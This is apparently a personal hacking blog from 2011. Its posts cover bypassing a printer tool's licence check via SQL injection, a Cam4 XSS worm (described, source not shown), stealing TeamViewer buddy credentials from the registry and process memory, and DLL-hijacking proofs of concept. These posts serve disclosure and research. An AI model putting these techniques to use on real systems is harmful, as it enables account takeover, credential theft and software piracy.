LOCU'S STUFF

Protected: Windows Phone 7: Remote Crash

xlocux — Fri, 27 Jan 2012 03:17:44 +0000

This post is password protected. You must visit the website and enter the password to continue reading.

When Reversing meet SQL Injection

xlocux — Thu, 15 Dec 2011 09:58:32 +0000

It’s been a while since i wrote my last thread, life goes fast and the time is always less than before. Anyway lately i found an interesting target that push me up to write few lines about this case. Someone i knew in a forum has posted a thread regarding a software (an Epson print cartridges resetter) that use a server validation to work, nothing special but i had some free time and i start working on it.

From a cracker point of view i begin to debug the program looking inside the registration routine to check how the validation works, and if was possible to bypass it.

When i patched the server-check the app seems run fine but i did not have an Epson’s Printer to test it so i thought to take another approach to the problem and collect more infos, like connection type, protocol, server address and so on, in order to obtain the same result without patching the target. I sniffed few packets during the Server/Client communication and in fact was possible to emulate the server reply so i coded a simple tcp server to accomplish the work but during my testing i see some sql error from the server so i though to try some SQL Injection jutzu and in less then a minute a got it!

The coder of this prog has made 2 fatal errors forgetting to sanityze the input parameter in the SQL statement and also in the client application.

The next time you found a similar server check, rather than start from the reversing would be better to try some SQLi first!

Hash Crack

xlocux — Mon, 15 Aug 2011 20:24:14 +0000

I wrote a tool that use md5decrypter API to decrypt MD4,MD5,NTLM,LM,SHA1,MySQL5 password.

A big thanks to md5decrypter.co.uk for the great hashes database, over 8.7 billion unique decrypted passwords, their work is very precious.

File Url: HCrack

Rar Password: locu

MD5 Checksum: 1bf409e8ec95f0627c817b1d71948cae

SHA1 Checksum: 801454b584a73fb9480de64be0448f68f47b76a5

Cam4: Persistent XSS Aka Worm

xlocux — Mon, 27 Jun 2011 02:59:14 +0000

A friend of mine has told me about this website so I take a look at it and i was impressed to see thousands of free live webcam with any sorts of sex perversions (sounds like a piece of paradise or hell depends from the points of view). Therefore i start thinking about security and, after 10 minutes, i found a critical flaw in the user profile.

In fact every user has a profile questionary that will be showed always below the webcam also during the show. The questionary inputs are NOT well filtered so i thought to use a xss as vector for the worm.

|

Worm.js Source:

|

This basic worm just rewrite the victim questionary to propagate itself. As you can see, in the highlighted line, i’ve put and image with the onmouseover function in order to emulate the submit button, so when the victim move the mouse pointer over the pic the game is done and the user is infected.

|

|

These threats have a massive propagation because the infection is exponential. Usually a camshow is approximately viewed by 1000 users or so and, as the Law of large numbers teaches us, someone will pass their mouse on the “viral” image and will be infected and the story begins again but now we’ve more than one user infected that could spread the worm, in this way all the catchment area will be saturated in a few days as we already saw with twitter, myspace etc.

As i said before my worm is very basic just few lines of html and javascript to show the flaw but an attacker could use different way to improve the worm and maximize the results, also the intent could change to steal session,data, tokens etc. I tried many times to contact the technical support to fix the problem but they didn’t reply to my advice so i leave this post as an alert for all the cam4 users.

MD5/SHA1 Checksum Calculator

xlocux — Mon, 23 May 2011 20:32:27 +0000

Simple tool to calculate files checksum that support MD5 and SHA1.

File Url: MD5-SHA1Checksum

Passwords: locu

MD5 Checksum: 1a9bbf0cd532b43771a97c59f123ae9b

Donate

BitCoin Hash: 1BUJBHNM8GwbD9cRwByZbSSdWf7Lrk3CST

Windows Phone 7: MyPostePay

xlocux — Mon, 16 May 2011 17:41:23 +0000

I don’t use the wallet so i built an app to store my postepay, for security reason i’ve not included the cvv and the card number is encrypted with AES. Login is required to decrypt and access data.

App Url: MyPostePay

Rar Password: locu

MD5 Checksum: 52124075B84079F095E3C1272635A309

Donate

BitCoin Hash: 1BUJBHNM8GwbD9cRwByZbSSdWf7Lrk3CST

Windows Phone 7: SecMes

xlocux — Sun, 08 May 2011 23:12:28 +0000

Recently I bought a “Samsung Omnia 7″ and I have started some projects, just to get more feeling with the work enviroment, I found a very poor framework, many apis are not yet implemented and silverlight sucks, anyway I got a lot of fun during the developing so I thought to post one of them. Obviously to install the tool you need an unlocked windows phone 7 smartphone and a deployer tool.

SecMes is a tool usefull to secure your E-Mail and SMS with 256-bit AES encryption, you can send and receive encrypted message between friends, just setting the same key.

Main Screen

It also allow to save separated key for each contact, in order to have different keys for any friends.

userlist

All the keys are stored in the phone so i added a login screen to access the main page just to get more privacy from other eyes.

login

Url: SecMes 1.4.11.rar

Pass: locu

MD5 Checksum: 8330FA9BACBD5CAD18D099038F73F83E

Donate

BitCoin Hash: 1BUJBHNM8GwbD9cRwByZbSSdWf7Lrk3CST

2 Cent About Team Viewer Buddies

xlocux — Sun, 17 Apr 2011 01:09:49 +0000

Nowadays TeamViewer (TV) is one of the best remote desktop application, its use is widely diffused in all the net from private customers to business. Apparently it seems to be bug free but with a bit of Social Engineering it could become an open windows on your system an your TV buddies. Let’s immaginate a scenario where the attacker has got access to a victim’s pc with TV installed he could copy the TV registry keys where the buddies password are stored in order to gain access also to their machines. The buddies settings are saved in the following keys:

HKEY_CURRENT_USER\Software\TeamViewer\Version5", "BuddyLoginName" HKEY_CURRENT_USER\Software\TeamViewer\Version5", "BuddyLoginPWAES"

User and password are encrypted with AES but this is not a real problem because you can directly copy the keys into your registry and the job is done, now you can login on TV buddies with the victim account if they are using a default password of course.

It’s also possible to debug TV to decrypt the passwords at fly but is boring, I choose to use WinHex to check the process memory with an adequate pattern.

This byte sequence should help to land very close to the decrypted password.

77006C006D00610069006C002E006500780065

The “bug”, as always, is located at half road between the monitor and the back of the chair, this is the concept where the social engineering is focused. I wont go over the lines but todays this type of hoax is the best tool that the hackers can use to gain informations or exploit their target. So be carefull when you store your password somewhere.

Mega Menager <= 3.4.0.9 Insecure Library Loading Vulnerability

xlocux — Wed, 02 Mar 2011 12:06:16 +0000

============ { Advisory 02/03/2011 } =============

/*

PoC Title: Mega Menager <= 3.4.0.9 Insecure Library Loading Vulnerability

(dwmapi.dll,msjet49.dll,msjet48.dll,msjet47.dll,msjet46.dll,msjet45.dll)

Software Link: http://www.megaupload.com/?c=tools

Associated Extension: .megamanager

Tested on: Windows xp sp3 x32

*/
#include

BOOL WINAPI DllMain (

HANDLE hinstDLL,

DWORD fdwReason,

LPVOID lpvReserved

)

{

switch (fdwReason)

{

case DLL_PROCESS_ATTACH:

exploit();

case DLL_THREAD_ATTACH:

case DLL_THREAD_DETACH:

case DLL_PROCESS_DETACH:

break; }

return TRUE;}

int exploit()

{

MessageBox(0, “Hijacked!!!”, “DLL Message”, MB_OK);

}

/*

Credits:

# Discoverd By: Locu

# Website: http://xlocux.wordpress.com

# Contacts: xlocux[-at-]gmail.com

*/

================== { EOF } =====================

HexWorkshop <= 6.xx Insecure Library Loading Vulnerability

xlocux — Thu, 24 Feb 2011 14:40:45 +0000

============ { Advisory 09/01/2011 } =============

/*

PoC Title: Hex Workshop Insecure Library Loading Vulnerability (pe932d.dll,pe936d.dll,pegrc32d.dll)
Software Link:: http://www.bpsoft.com
Tested on: Windows xp sp3 x32

*/
#include

BOOL WINAPI DllMain (

HANDLE hinstDLL,

DWORD fdwReason,

LPVOID lpvReserved

)

{

switch (fdwReason)

{

case DLL_PROCESS_ATTACH:

exploit();

case DLL_THREAD_ATTACH:

case DLL_THREAD_DETACH:

case DLL_PROCESS_DETACH:

break; }

return TRUE;}

int exploit()

{

MessageBox(0, “Hijacked!!!”, “DLL Message”, MB_OK);

}

/*

Credits:

# Discoverd By: Locu

# Website: http://xlocux.wordpress.com

# Contacts: xlocux[-at-]gmail.com

*/

================== { EOF } =====================